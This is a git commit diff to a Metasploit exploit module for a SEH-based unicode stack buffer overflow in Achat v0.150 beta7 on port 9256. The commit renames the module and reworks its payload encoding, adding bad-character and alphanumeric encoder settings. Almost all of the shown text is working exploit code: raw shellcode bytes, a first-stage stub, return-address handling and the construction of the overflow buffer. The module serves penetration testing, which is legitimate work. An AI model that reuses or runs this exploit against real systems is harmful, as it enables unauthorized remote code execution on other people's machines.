proper payload encoding from now on

earthquake · earthquake · commit ac6879cfe165 · 2015-02-09T23:36:35.000+01:00
diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Achat Beta v0.150 Buffer Overflow',
+      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
       'Description'    => %q{
          This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
          by sending a crafted message to the default harcoded port 9256. The message
@@ -38,9 +38,11 @@ def initialize(info = {})
         },
       'Payload'        =>
         {
+          'DisableNops' => true,
           'Space'    => 730,
-#          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
+          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
           'StackAdjustment' => -3500,
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
           'EncoderOptions'  =>
             {
               'BufferRegister' => 'EAX',
@@ -84,9 +86,6 @@ def exploit
     # 59               POP ECX                  # padding
     # 0039             ADD BYTE PTR DS:[ECX],BH # padding
     firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
-    encoder = framework.encoders.create('x86/unicode_mixed')
-    encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
-    payloadencoded = encoder.encode(payload.raw, nil, nil, platform)
 
     sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
     sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
@@ -117,7 +116,7 @@ def exploit
     sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
     sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
     sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
-    sploit << payloadencoded + "A"*(1152-payloadencoded.length) # placing the payload
+    sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload
     sploit << "\x00" + "A"*10 + "\x00"
 
 
